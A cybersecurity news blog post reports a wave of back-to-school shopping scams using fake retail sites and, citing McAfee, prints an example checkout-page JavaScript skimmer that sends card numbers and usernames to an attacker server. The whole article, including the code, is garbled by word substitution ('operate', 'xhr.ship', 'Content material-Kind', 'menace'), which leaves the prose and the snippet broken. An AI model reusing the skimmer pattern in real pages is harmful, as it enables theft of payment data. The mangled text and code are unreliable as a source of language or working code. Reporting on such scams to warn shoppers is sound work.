Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Beware of New back-to-school Shopping Scams That Tricks Drives Users to Fake Shopping Sites

Beware of New back-to-school Shopping Scams That Tricks Drives Users to Fake Shopping Sites

Posted on August 18, 2025August 18, 2025 By CWS

As households throughout the nation put together for the return to high school, cybercriminals are exploiting the seasonal rush with a recent wave of subtle procuring scams.

Leveraging peaks in on-line spending, scammers are deploying malicious campaigns that prey on unsuspecting customers trying to find provide offers and unique presents.

The emergence of those scams coincides with rising experiences of counterfeit retail web sites, manipulated supply notifications, and intelligent phishing lures—all meticulously engineered to reap private and cost credentials.

This 12 months’s marketing campaign distinguishes itself by way of the deployment of convincingly crafted pretend websites, that are extensively disseminated by way of sponsored search placements, electronic mail promotions, and—most notably—social media advertisements.

These phony adverts boast enticing offers on all the pieces from classroom necessities to big-ticket electronics, using AI-driven visuals to imitate respected retailers.

The seamless expertise these websites provide belies their fraudulent intent, with many victims solely realizing the deception after funds are misplaced or non-public information compromised.

McAfee analysts recognized this coordinated menace surge in early August, following a marked enhance in consumer experiences and menace telemetry.

Their analysis revealed that these scammers make use of automated platforms to shortly spin up huge portions of pretend procuring portals.

Every website is engineered to evade primary detection, utilizing randomized area registrations and SSL certificates to bolster obvious legitimacy.

These technical ploys, mixed with aggressive promotion on social platforms, funnel a excessive quantity of net site visitors by way of malicious infrastructure.

A very insidious technical vector uncovered by McAfee researchers entails backend JavaScript payloads embedded in checkout pages.

Upon kind submission, these scripts invisibly relay harvested bank card numbers and login credentials to attacker-controlled servers, usually encrypting transmissions to avoid primary community filters.

The embedded payload resembles the next obfuscated sample:-

(operate(){
var xhr=new XMLHttpRequest();
xhr.open(‘POST’,’
xhr.setRequestHeader(‘Content material-Kind’,’software/json’);
xhr.ship(JSON.stringify({card:doc.getElementById(‘cc_num’).worth,consumer:doc.getElementById(‘usr’).worth}));
})();

This method not solely permits rapid credential exfiltration but in addition gives attackers with a persistent foothold for additional account compromise.

Because the back-to-school season continues, customers—particularly these enticed by unfamiliar retailers and pressing promotional advertisements—stay prime targets for such superior and evolving scams.

Increase your SOC and assist your crew shield your small business with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:backtoschool, Beware, Drives, Fake, Scams, Shopping, Sites, Tricks, Users

Post navigation

Previous Post: How to Set Up Parental Controls on Devices
Next Post: North Korean Hackers Stealthy Linux Malware Leaked Online

Related Posts

Red Hat Confirms Data Breach After Hackers Claim to Steal 570GB of Private GitHub Repositories Red Hat Confirms Data Breach After Hackers Claim to Steal 570GB of Private GitHub Repositories Cyber Security News
Germany Urges Apple, Google to Block Chinese AI App DeepSeek Over Privacy Rules Germany Urges Apple, Google to Block Chinese AI App DeepSeek Over Privacy Rules Cyber Security News
Authorities Arrested Hackers With Specialized FLIPPER Hacking Equipment Used to Attack IT Systems Authorities Arrested Hackers With Specialized FLIPPER Hacking Equipment Used to Attack IT Systems Cyber Security News
Handala Hackers Targeted Israeli Officials by Compromising Telegram Accounts Handala Hackers Targeted Israeli Officials by Compromising Telegram Accounts Cyber Security News
Chinese State-Sponsored Hackers Attacking Semiconductor Industry with Weaponized Cobalt Strike Chinese State-Sponsored Hackers Attacking Semiconductor Industry with Weaponized Cobalt Strike Cyber Security News
7-Zip Arbitrary File Write Vulnerability Let Attackers Execute Arbitrary Code 7-Zip Arbitrary File Write Vulnerability Let Attackers Execute Arbitrary Code Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News